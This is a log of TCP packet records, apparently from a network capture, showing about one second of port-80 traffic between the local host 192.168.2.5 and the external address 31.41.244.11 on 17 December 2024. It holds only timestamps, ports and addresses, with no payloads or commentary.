Dec 17, 2024 06:03:38.858062029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.866492033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.866576910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.866578102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.866621971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.874908924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.874921083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.874985933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.883167982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.883269072 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.883272886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.883323908 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.891474009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.891552925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.891628027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.891671896 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.899955034 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.900031090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.900063992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.900104046 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.908247948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.908324957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.908452034 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.908497095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.916070938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.916083097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.916163921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.923616886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.923702002 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.923703909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.923744917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.965147018 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.965229034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:38.965292931 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:38.965486050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.037693024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.037708044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.037879944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.039258003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.039272070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.039308071 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.044167995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.044255972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.044296026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.044344902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.049230099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.049289942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.049310923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.049335957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.054250002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.054344893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.054383039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.054429054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.059134960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.059189081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.059187889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.059226036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.063796997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.063886881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.063924074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.063962936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.068766117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.068804979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.068840027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.068867922 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.073565960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.073645115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.073777914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.073818922 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.078578949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.078589916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.078671932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.083225965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.083236933 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.083318949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.088114023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.088128090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.088176966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.092861891 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.092873096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.092940092 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.097717047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.097728014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.097764969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.101453066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.101515055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.102468014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.102509975 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.105370998 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.105382919 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.105416059 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.109185934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.109198093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.109245062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.230288029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.230309010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.230354071 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.230377913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.231661081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.231672049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.231712103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.234548092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.234589100 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.235217094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.235258102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.237631083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.237644911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.237673044 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.237687111 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.240504026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.240567923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.240775108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.240812063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.243565083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.243576050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.243618011 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.246525049 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.246537924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.246573925 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.246583939 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.249516010 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.249564886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.249571085 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.249615908 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.252428055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.252477884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.252536058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.252583027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.255393028 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.255490065 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.255557060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.255598068 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.258446932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.258483887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.258501053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.258521080 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.261447906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.261506081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.261507988 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.261549950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.264436960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.264471054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.264487028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.264509916 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.267333031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.267422915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.267469883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.267513037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.270442009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.270476103 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.270497084 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.270518064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.273251057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.273335934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.273471117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.273518085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.276201963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.276251078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.276333094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.276376963 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.279233932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.279305935 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.279377937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.279428959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.282242060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.282277107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.282296896 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.282322884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.285123110 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.285178900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.285372972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.285419941 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.288084984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.288177967 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.288244963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.288283110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.291045904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.291094065 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.291369915 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.291418076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.294013977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.294065952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.294317961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.294372082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.297024965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.297075033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.297139883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.297184944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.300072908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.300157070 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.300229073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.300272942 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.303024054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.303059101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.303076982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.303105116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.306061029 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.306111097 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.306220055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.306220055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.308939934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.308995962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.309046984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.309098005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.312047958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.312083006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.312103987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.312128067 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.314934015 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.314969063 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.314985037 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.315150023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.317949057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.317985058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.318003893 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.318027973 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.320894003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.320930004 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.320949078 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.320972919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.323880911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.323939085 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.422346115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.422439098 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.422456026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.422506094 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.423671007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.423727036 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.423767090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.423821926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.427350044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.427447081 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.427627087 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.427673101 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.428962946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.429009914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.429086924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.429128885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.431824923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.431862116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.431886911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.431924105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.434170961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.434231997 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.434395075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.434444904 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.436691999 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.436741114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.436793089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.436836004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.439153910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.439239025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.439291954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.439337015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.441509008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.441557884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.441792011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.441834927 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.443986893 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.444036007 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.444091082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.444132090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.446455002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.446510077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.446691990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.446737051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.448626041 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.448673010 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.448898077 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.448942900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.450922012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.451006889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.451184988 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.451226950 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.453360081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.453416109 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.453474045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.453512907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.455641031 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.455676079 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.455697060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.455713987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.457983971 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.458018064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.458045006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.458065033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.460174084 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.460231066 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.460350990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.460390091 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.462502003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.462593079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.462677002 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.462718964 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.464823961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.464890003 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.464920044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.464970112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.467073917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.467204094 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.467245102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.467830896 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.469589949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.469650030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.469692945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.469737053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.471565008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.471613884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.471687078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.471729994 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.473831892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.473886013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.474073887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.474118948 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.476382017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.476448059 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.476473093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.476516962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.478547096 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.478584051 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.478596926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.478621960 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.480978966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.481014967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.481024027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.481051922 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.483144045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.483198881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.483295918 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.483335972 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.485488892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.485522985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.485538006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.485560894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.487695932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.487807989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.487821102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.487864971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:39.489945889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:39.490034103 CET	49902	80	192.168.2.5	31.41.244.11
